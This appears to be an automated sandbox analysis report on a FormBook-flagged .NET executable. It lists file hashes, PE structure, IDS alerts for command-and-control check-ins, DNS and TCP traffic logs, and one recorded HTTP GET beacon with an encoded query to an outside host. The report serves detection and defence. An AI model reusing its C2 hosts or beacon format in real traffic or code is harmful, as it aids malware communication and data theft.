                                                            Malicious:true
                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):6.459218145787354
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Windows Screen Saver (13104/52) 0.07%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            File name:4Ear91jgQ7.exe
                                                            File size:33'792 bytes
                                                            MD5:dcf2ceb7faa5754e5fb0b7db1cc23637
                                                            SHA1:0259609ed1ec649f797869ca14a7aef9f2029ffb
                                                            SHA256:9732f930cd31110f63aaf92cc17895b65303bb06a4968b127f4687270941acdd
                                                            SHA512:2f2347bf1fffe021deaae8a77695026498d8d9c8e715ed991cdaa4086c4df9196d4592855947912c27b7bb56f1567f92fe1cfaf324d2d41291618009b26fb487
                                                            SSDEEP:384:dHjYE/8qnRY1yoY4CTj0MiKSFp9paTqjkSdKrA+5WmC9NAkYIbdkK8oy10jq4ryj:ZEi7/iKSBpaPL0XY0jSSfOf876sNfpE
                                                            TLSH:A1E23A1177C94AB7CBEB0775602053214B30E7539E17FB9EA86C124A49963CF56833F6
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....n...............0..V...........t... ........@.. ....................................@................................
                                                            Icon Hash:8132a94c4c6db28d
                                                            Entrypoint:0x4074e2
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0xE66E8ABF [Fri Jul 4 10:02:39 2092 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                            Name | Virtual Address | Virtual Size | Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7488 | 0x57 | .text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x8000 | 0x2868 | .rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc000 | 0xc | .reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x7508 | 0x1c | .text
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                            Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                            .text | 0x2000 | 0x559c | 0x5600 | b9a21dacf3da7f757da2dc426e71962b | False | 0.4675690406976744 | data | 5.857346871097696 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rsrc | 0x8000 | 0x2868 | 0x2a00 | 049bcb7e6c6daf97c16039e250ae2436 | False | 0.8681175595238095 | data | 7.470403058205651 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc | 0xc000 | 0xc | 0x200 | e595f29153c180472b421a788e0f07f3 | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                            RT_ICON | 0x8130 | 0x221b | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9794983392509449
                                                            RT_GROUP_ICON | 0xa34c | 0x14 | data | | | 1.05
                                                            RT_VERSION | 0xa360 | 0x31c | data | | | 0.4296482412060301
                                                            RT_MANIFEST | 0xa67c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347

                                                            DLL | Import
                                                            mscoree.dll | _CorExeMain
                                                            Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
                                                            2024-07-23T14:50:57.879866+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49742 | 80 | 192.168.2.5 | 43.155.26.241
                                                            2024-07-23T14:51:22.805881+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 49746 | 80 | 192.168.2.5 | 43.155.26.241
                                                            2024-07-23T14:50:55.333044+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49739 | 80 | 192.168.2.5 | 43.155.26.241
                                                            2024-07-23T14:50:42.942343+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49730 | 80 | 192.168.2.5 | 84.32.84.121
                                                            2024-07-23T14:51:00.411005+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49744 | 80 | 192.168.2.5 | 43.155.26.241
                                                            2024-07-23T14:50:40.420760+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49728 | 80 | 192.168.2.5 | 84.32.84.121
                                                            2024-07-23T14:50:45.608238+0200 | TCP | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 49732 | 80 | 192.168.2.5 | 84.32.84.121
                                                            2024-07-23T14:50:11.389671+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 49722 | 80 | 192.168.2.5 | 23.227.38.74
                                                            2024-07-23T14:50:48.333694+0200 | TCP | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 49734 | 80 | 192.168.2.5 | 84.32.84.121
                                                            Jul 23, 2024 14:50:46.629951954 CEST4973280192.168.2.584.32.84.121
                                                            Jul 23, 2024 14:50:47.665179968 CEST4973480192.168.2.584.32.84.121
                                                            Jul 23, 2024 14:50:47.673022032 CEST804973484.32.84.121192.168.2.5
                                                            Jul 23, 2024 14:50:47.674644947 CEST4973480192.168.2.584.32.84.121
                                                            Jul 23, 2024 14:50:47.676683903 CEST4973480192.168.2.584.32.84.121
                                                            Jul 23, 2024 14:50:47.686676025 CEST804973484.32.84.121192.168.2.5
                                                            Jul 23, 2024 14:50:48.333549023 CEST804973484.32.84.121192.168.2.5
                                                            Jul 23, 2024 14:50:48.333570957 CEST804973484.32.84.121192.168.2.5
                                                            Jul 23, 2024 14:50:48.333584070 CEST804973484.32.84.121192.168.2.5
                                                            Jul 23, 2024 14:50:48.333693981 CEST4973480192.168.2.584.32.84.121
                                                            Jul 23, 2024 14:50:48.333736897 CEST4973480192.168.2.584.32.84.121
                                                            Jul 23, 2024 14:50:48.333878040 CEST804973484.32.84.121192.168.2.5
                                                            Jul 23, 2024 14:50:48.333914995 CEST4973480192.168.2.584.32.84.121
                                                            Jul 23, 2024 14:50:48.336189032 CEST4973480192.168.2.584.32.84.121
                                                            Jul 23, 2024 14:50:48.569380999 CEST804973484.32.84.121192.168.2.5
                                                            Jul 23, 2024 14:50:48.569442034 CEST4973480192.168.2.584.32.84.121
                                                            Jul 23, 2024 14:50:48.572124958 CEST804973484.32.84.121192.168.2.5
                                                            Jul 23, 2024 14:50:52.686212063 CEST49738443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:52.686245918 CEST4434973813.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:52.686397076 CEST49738443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:52.690474987 CEST49738443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:52.690486908 CEST4434973813.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:53.306473017 CEST4434973813.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:53.306583881 CEST49738443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:53.308094025 CEST49738443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:53.308101892 CEST4434973813.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:53.308476925 CEST4434973813.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:53.369577885 CEST49738443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:53.412508011 CEST4434973813.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:53.820727110 CEST4973980192.168.2.543.155.26.241
                                                            Jul 23, 2024 14:50:53.825907946 CEST804973943.155.26.241192.168.2.5
                                                            Jul 23, 2024 14:50:53.825994015 CEST4973980192.168.2.543.155.26.241
                                                            Jul 23, 2024 14:50:53.828190088 CEST4973980192.168.2.543.155.26.241
                                                            Jul 23, 2024 14:50:53.833081961 CEST804973943.155.26.241192.168.2.5
                                                            Jul 23, 2024 14:50:53.954710007 CEST4434973813.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:53.963421106 CEST4434973813.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:50:53.963498116 CEST49738443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:53.965840101 CEST49738443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:50:55.333044052 CEST4973980192.168.2.543.155.26.241
                                                            Jul 23, 2024 14:50:55.383033037 CEST804973943.155.26.241192.168.2.5
                                                            Jul 23, 2024 14:50:56.350893021 CEST4974280192.168.2.543.155.26.241
                                                            Jul 23, 2024 14:50:56.356910944 CEST804974243.155.26.241192.168.2.5
                                                            Jul 23, 2024 14:50:56.357012033 CEST4974280192.168.2.543.155.26.241
                                                            Jul 23, 2024 14:50:56.363245964 CEST4974280192.168.2.543.155.26.241
                                                            Jul 23, 2024 14:50:56.372555971 CEST804974243.155.26.241192.168.2.5
                                                            Jul 23, 2024 14:50:57.879865885 CEST4974280192.168.2.543.155.26.241
                                                            Jul 23, 2024 14:50:57.927018881 CEST804974243.155.26.241192.168.2.5
                                                            Jul 23, 2024 14:50:58.898284912 CEST4974480192.168.2.543.155.26.241
                                                            Jul 23, 2024 14:50:58.905639887 CEST804974443.155.26.241192.168.2.5
                                                            Jul 23, 2024 14:50:58.906070948 CEST4974480192.168.2.543.155.26.241
                                                            Jul 23, 2024 14:50:58.908078909 CEST4974480192.168.2.543.155.26.241
                                                            Jul 23, 2024 14:50:58.914150953 CEST804974443.155.26.241192.168.2.5
                                                            Jul 23, 2024 14:50:58.914161921 CEST804974443.155.26.241192.168.2.5
                                                            Jul 23, 2024 14:51:00.411005020 CEST4974480192.168.2.543.155.26.241
                                                            Jul 23, 2024 14:51:00.463511944 CEST804974443.155.26.241192.168.2.5
                                                            Jul 23, 2024 14:51:01.433624983 CEST4974680192.168.2.543.155.26.241
                                                            Jul 23, 2024 14:51:01.438631058 CEST804974643.155.26.241192.168.2.5
                                                            Jul 23, 2024 14:51:01.438709974 CEST4974680192.168.2.543.155.26.241
                                                            Jul 23, 2024 14:51:01.440617085 CEST4974680192.168.2.543.155.26.241
                                                            Jul 23, 2024 14:51:01.446243048 CEST804974643.155.26.241192.168.2.5
                                                            Jul 23, 2024 14:51:05.839711905 CEST49750443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:05.839759111 CEST4434975013.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:05.839845896 CEST49750443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:05.844100952 CEST49750443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:05.844114065 CEST4434975013.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:06.438000917 CEST4434975013.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:06.438262939 CEST49750443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:06.439696074 CEST49750443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:06.439708948 CEST4434975013.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:06.440038919 CEST4434975013.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:06.489029884 CEST49750443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:06.549534082 CEST49750443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:06.596508980 CEST4434975013.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:07.107754946 CEST4434975013.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:07.107985973 CEST4434975013.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:07.108047962 CEST49750443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:07.112519026 CEST49750443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:14.639904022 CEST49754443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:14.639966011 CEST4434975413.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:14.640037060 CEST49754443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:14.642648935 CEST49754443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:14.642666101 CEST4434975413.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:15.203219891 CEST804973943.155.26.241192.168.2.5
                                                            Jul 23, 2024 14:51:15.203274965 CEST4973980192.168.2.543.155.26.241
                                                            Jul 23, 2024 14:51:15.261159897 CEST4434975413.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:15.261245966 CEST49754443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:15.266640902 CEST49754443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:15.266663074 CEST4434975413.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:15.266913891 CEST4434975413.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:15.292572021 CEST49754443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:15.336496115 CEST4434975413.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:15.877055883 CEST4434975413.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:15.877136946 CEST4434975413.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:15.877279997 CEST49754443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:15.879303932 CEST49754443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:17.747431040 CEST804974243.155.26.241192.168.2.5
                                                            Jul 23, 2024 14:51:17.747505903 CEST4974280192.168.2.543.155.26.241
                                                            Jul 23, 2024 14:51:20.274478912 CEST804974443.155.26.241192.168.2.5
                                                            Jul 23, 2024 14:51:20.274811029 CEST4974480192.168.2.543.155.26.241
                                                            Jul 23, 2024 14:51:22.805660009 CEST804974643.155.26.241192.168.2.5
                                                            Jul 23, 2024 14:51:22.805881023 CEST4974680192.168.2.543.155.26.241
                                                            Jul 23, 2024 14:51:22.806612968 CEST4974680192.168.2.543.155.26.241
                                                            Jul 23, 2024 14:51:22.811463118 CEST804974643.155.26.241192.168.2.5
                                                            Jul 23, 2024 14:51:23.312710047 CEST49756443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:23.312762022 CEST4434975613.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:23.312827110 CEST49756443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:23.315661907 CEST49756443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:23.315701962 CEST4434975613.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:23.935415030 CEST4434975613.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:23.935489893 CEST49756443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:23.936965942 CEST49756443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:23.936986923 CEST4434975613.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:23.940880060 CEST4434975613.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:23.959203959 CEST49756443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:24.004498959 CEST4434975613.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:24.585530043 CEST4434975613.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:24.585627079 CEST4434975613.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:24.586654902 CEST49756443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:24.588692904 CEST49756443192.168.2.513.107.139.11
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Jul 23, 2024 14:49:17.384586096 CEST5816553192.168.2.51.1.1.1
                                                            Jul 23, 2024 14:49:18.969913960 CEST5710853192.168.2.51.1.1.1
                                                            Jul 23, 2024 14:49:42.135776997 CEST5166353192.168.2.51.1.1.1
                                                            Jul 23, 2024 14:50:05.526951075 CEST5036153192.168.2.51.1.1.1
                                                            Jul 23, 2024 14:50:05.551574945 CEST53503611.1.1.1192.168.2.5
                                                            Jul 23, 2024 14:50:08.347829103 CEST5333853192.168.2.51.1.1.1
                                                            Jul 23, 2024 14:50:10.573659897 CEST5234253192.168.2.51.1.1.1
                                                            Jul 23, 2024 14:50:10.808659077 CEST53523421.1.1.1192.168.2.5
                                                            Jul 23, 2024 14:50:20.560156107 CEST5168953192.168.2.51.1.1.1
                                                            Jul 23, 2024 14:50:29.585359097 CEST6480053192.168.2.51.1.1.1
                                                            Jul 23, 2024 14:50:31.536628962 CEST5788153192.168.2.51.1.1.1
                                                            Jul 23, 2024 14:50:31.692128897 CEST53578811.1.1.1192.168.2.5
                                                            Jul 23, 2024 14:50:39.837177992 CEST6298853192.168.2.51.1.1.1
                                                            Jul 23, 2024 14:50:39.918812037 CEST53629881.1.1.1192.168.2.5
                                                            Jul 23, 2024 14:50:53.352060080 CEST5802053192.168.2.51.1.1.1
                                                            Jul 23, 2024 14:50:53.818104982 CEST53580201.1.1.1192.168.2.5
                                                            Jul 23, 2024 14:51:24.631124973 CEST6354853192.168.2.51.1.1.1
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
| --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Jul 23, 2024 14:49:17.384586096 CEST | 192.168.2.5 | 1.1.1.1 | 0x7d3c | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001) | false |
| Jul 23, 2024 14:49:18.969913960 CEST | 192.168.2.5 | 1.1.1.1 | 0xdc79 | Standard query (0) | cdsf1g.db.files.1drv.com | A (IP address) | IN (0x0001) | false |
| Jul 23, 2024 14:49:42.135776997 CEST | 192.168.2.5 | 1.1.1.1 | 0x5577 | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001) | false |
| Jul 23, 2024 14:50:05.526951075 CEST | 192.168.2.5 | 1.1.1.1 | 0x735e | Standard query (0) | www.gospelstudygroup.org | A (IP address) | IN (0x0001) | false |
| Jul 23, 2024 14:50:08.347829103 CEST | 192.168.2.5 | 1.1.1.1 | 0x7a08 | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001) | false |
| Jul 23, 2024 14:50:10.573659897 CEST | 192.168.2.5 | 1.1.1.1 | 0x5d9a | Standard query (0) | www.valerieomage.com | A (IP address) | IN (0x0001) | false |
| Jul 23, 2024 14:50:20.560156107 CEST | 192.168.2.5 | 1.1.1.1 | 0x2561 | Standard query (0) | cdsf1g.db.files.1drv.com | A (IP address) | IN (0x0001) | false |
| Jul 23, 2024 14:50:29.585359097 CEST | 192.168.2.5 | 1.1.1.1 | 0xdd9f | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001) | false |
| Jul 23, 2024 14:50:31.536628962 CEST | 192.168.2.5 | 1.1.1.1 | 0xb9ee | Standard query (0) | www.instantmailer.cloud | A (IP address) | IN (0x0001) | false |
| Jul 23, 2024 14:50:39.837177992 CEST | 192.168.2.5 | 1.1.1.1 | 0x538d | Standard query (0) | www.kosherphonestore.com | A (IP address) | IN (0x0001) | false |
| Jul 23, 2024 14:50:53.352060080 CEST | 192.168.2.5 | 1.1.1.1 | 0xac64 | Standard query (0) | www.cwgehkk.store | A (IP address) | IN (0x0001) | false |
| Jul 23, 2024 14:51:24.631124973 CEST | 192.168.2.5 | 1.1.1.1 | 0xed02 | Standard query (0) | cdsf1g.db.files.1drv.com | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Jul 23, 2024 14:49:17.393198967 CEST | 1.1.1.1 | 192.168.2.5 | 0x7d3c | No error (0) | onedrive.live.com | web.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Jul 23, 2024 14:49:17.393198967 CEST | 1.1.1.1 | 192.168.2.5 | 0x7d3c | No error (0) | web.fe.1drv.com | odc-web-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Jul 23, 2024 14:49:17.393198967 CEST | 1.1.1.1 | 192.168.2.5 | 0x7d3c | No error (0) | odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net | dual-spov-0006.spov-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Jul 23, 2024 14:49:17.393198967 CEST | 1.1.1.1 | 192.168.2.5 | 0x7d3c | No error (0) | dual-spov-0006.spov-msedge.net | | 13.107.137.11 | A (IP address) | IN (0x0001) | false |
| Jul 23, 2024 14:49:17.393198967 CEST | 1.1.1.1 | 192.168.2.5 | 0x7d3c | No error (0) | dual-spov-0006.spov-msedge.net | | 13.107.139.11 | A (IP address) | IN (0x0001) | false |
| Jul 23, 2024 14:49:19.091557026 CEST | 1.1.1.1 | 192.168.2.5 | 0xdc79 | No error (0) | cdsf1g.db.files.1drv.com | db-files.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Jul 23, 2024 14:49:19.091557026 CEST | 1.1.1.1 | 192.168.2.5 | 0xdc79 | No error (0) | db-files.fe.1drv.com | odc-db-files-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Jul 23, 2024 14:49:42.144566059 CEST | 1.1.1.1 | 192.168.2.5 | 0x5577 | No error (0) | onedrive.live.com | web.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Jul 23, 2024 14:49:42.144566059 CEST | 1.1.1.1 | 192.168.2.5 | 0x5577 | No error (0) | web.fe.1drv.com | odc-web-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Jul 23, 2024 14:49:42.144566059 CEST | 1.1.1.1 | 192.168.2.5 | 0x5577 | No error (0) | odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net | dual-spov-0006.spov-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Jul 23, 2024 14:49:42.144566059 CEST | 1.1.1.1 | 192.168.2.5 | 0x5577 | No error (0) | dual-spov-0006.spov-msedge.net | | 13.107.137.11 | A (IP address) | IN (0x0001) | false |
| Jul 23, 2024 14:49:42.144566059 CEST | 1.1.1.1 | 192.168.2.5 | 0x5577 | No error (0) | dual-spov-0006.spov-msedge.net | | 13.107.139.11 | A (IP address) | IN (0x0001) | false |
| Jul 23, 2024 14:50:05.551574945 CEST | 1.1.1.1 | 192.168.2.5 | 0x735e | Name error (3) | www.gospelstudygroup.org | none | none | A (IP address) | IN (0x0001) | false |
| Jul 23, 2024 14:50:08.989136934 CEST | 1.1.1.1 | 192.168.2.5 | 0x7a08 | No error (0) | onedrive.live.com | web.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Jul 23, 2024 14:50:08.989136934 CEST | 1.1.1.1 | 192.168.2.5 | 0x7a08 | No error (0) | web.fe.1drv.com | odc-web-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Jul 23, 2024 14:50:08.989136934 CEST | 1.1.1.1 | 192.168.2.5 | 0x7a08 | No error (0) | odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net | dual-spov-0006.spov-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Jul 23, 2024 14:50:08.989136934 CEST | 1.1.1.1 | 192.168.2.5 | 0x7a08 | No error (0) | dual-spov-0006.spov-msedge.net | | 13.107.139.11 | A (IP address) | IN (0x0001) | false |
| Jul 23, 2024 14:50:08.989136934 CEST | 1.1.1.1 | 192.168.2.5 | 0x7a08 | No error (0) | dual-spov-0006.spov-msedge.net | | 13.107.137.11 | A (IP address) | IN (0x0001) | false |
| Jul 23, 2024 14:50:10.808659077 CEST | 1.1.1.1 | 192.168.2.5 | 0x5d9a | No error (0) | www.valerieomage.com | shops.myshopify.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Jul 23, 2024 14:50:10.808659077 CEST | 1.1.1.1 | 192.168.2.5 | 0x5d9a | No error (0) | shops.myshopify.com | | 23.227.38.74 | A (IP address) | IN (0x0001) | false |
| Jul 23, 2024 14:50:20.606180906 CEST | 1.1.1.1 | 192.168.2.5 | 0x2561 | No error (0) | cdsf1g.db.files.1drv.com | db-files.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Jul 23, 2024 14:50:20.606180906 CEST | 1.1.1.1 | 192.168.2.5 | 0x2561 | No error (0) | db-files.fe.1drv.com | odc-db-files-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Jul 23, 2024 14:50:29.592626095 CEST | 1.1.1.1 | 192.168.2.5 | 0xdd9f | No error (0) | onedrive.live.com | web.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Jul 23, 2024 14:50:29.592626095 CEST | 1.1.1.1 | 192.168.2.5 | 0xdd9f | No error (0) | web.fe.1drv.com | odc-web-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Jul 23, 2024 14:50:29.592626095 CEST | 1.1.1.1 | 192.168.2.5 | 0xdd9f | No error (0) | odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net | dual-spov-0006.spov-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Jul 23, 2024 14:50:29.592626095 CEST | 1.1.1.1 | 192.168.2.5 | 0xdd9f | No error (0) | dual-spov-0006.spov-msedge.net | | 13.107.139.11 | A (IP address) | IN (0x0001) | false |
| Jul 23, 2024 14:50:29.592626095 CEST | 1.1.1.1 | 192.168.2.5 | 0xdd9f | No error (0) | dual-spov-0006.spov-msedge.net | | 13.107.137.11 | A (IP address) | IN (0x0001) | false |
| Jul 23, 2024 14:50:31.692128897 CEST | 1.1.1.1 | 192.168.2.5 | 0xb9ee | Name error (3) | www.instantmailer.cloud | none | none | A (IP address) | IN (0x0001) | false |
| Jul 23, 2024 14:50:39.918812037 CEST | 1.1.1.1 | 192.168.2.5 | 0x538d | No error (0) | www.kosherphonestore.com | www.kosherphonestore.com.cdn.hstgr.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Jul 23, 2024 14:50:39.918812037 CEST | 1.1.1.1 | 192.168.2.5 | 0x538d | No error (0) | www.kosherphonestore.com.cdn.hstgr.net | | 84.32.84.121 | A (IP address) | IN (0x0001) | false |
| Jul 23, 2024 14:50:53.818104982 CEST | 1.1.1.1 | 192.168.2.5 | 0xac64 | No error (0) | www.cwgehkk.store | | 43.155.26.241 | A (IP address) | IN (0x0001) | false |
| Jul 23, 2024 14:51:24.692011118 CEST | 1.1.1.1 | 192.168.2.5 | 0xed02 | No error (0) | cdsf1g.db.files.1drv.com | db-files.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Jul 23, 2024 14:51:24.692011118 CEST | 1.1.1.1 | 192.168.2.5 | 0xed02 | No error (0) | db-files.fe.1drv.com | odc-db-files-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false |
                                                            • onedrive.live.com
                                                            • www.valerieomage.com
                                                            • www.kosherphonestore.com
                                                            • www.cwgehkk.store
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
| --- | --- | --- | --- | --- | --- | --- |
| 0 | 192.168.2.5 | 49722 | 23.227.38.74 | 80 | 1600 | C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe |
Timestamp | Bytes transferred | Direction | Data
Jul 23, 2024 14:50:10.832081079 CEST | 539 | OUT | GET /c7rq/?oBG=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl+OFvVeu4EU857dyc7w4+qhgXRMO7PTzi/X2HMMMtdNC+wv2+smLAouLcyIEijMeq9ccv2ntai0EWGFrkjFC0U/c7k/DTDLA==&3F=ZLtxCXoX HTTP/1.1
